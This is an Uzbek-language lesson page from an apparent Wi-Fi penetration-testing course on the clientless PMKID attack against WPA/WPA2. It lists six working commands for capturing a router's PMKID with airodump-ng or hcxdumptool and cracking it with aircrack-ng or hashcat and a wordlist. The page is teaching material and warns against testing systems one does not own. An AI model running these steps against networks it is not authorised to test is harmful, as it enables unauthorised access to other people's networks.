Modulga qaytish
O'quv darsi / Wi-Fi Pentesting (WPA/WPA2)

PMKID hujumi (mijozsiz)

Ba'zi routerlar PMKID yuboradi va bu hech qanday mijoz ulanishisiz parolga hujum qilish imkonini beradi. Bu usul har bir routerda ishlamaydi — bu routerga bog'liq.

25 daq.ilg'or6 komanda4/8
Dars holati
Davom etmoqda
Amaliy komandalar0/6
Maqsadlar
  • airodump-ng bilan PMKID yozish
  • hcxdumptool muqobil yo'l
  • hashcat orqali brute-force
Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

O'qish

airodump-ng yo'li

airodump-ng 1.7+ versiyalari PMKID ni avtomatik ushlaydi. 2-3 daqiqa kuting va aircrack-ng bilan parolni qidiring.

hcxdumptool yo'li

Aniqroq usul — hcxdumptool bilan yozib olish, hcxpcapngtool bilan hash.22000 ga o'tkazish va hashcat (rejim 22000) bilan brute-force.

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

0%
$sudo airodump-ng -c 5 --bssid 7C:8B:CA:B8:B3:B4 -w capture_pmkid wlan0mon
$aircrack-ng -w /usr/share/wordlists/rockyou.txt capture_pmkid-01.cap
$echo "7C:8B:CA:B8:B3:B4" > target.txt
$sudo hcxdumptool -i wlan0mon -w pmkid.pcapng --filterlist_ap=target.txt --filtermode=2
$hcxpcapngtool -o hash.22000 pmkid.pcapng
$hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt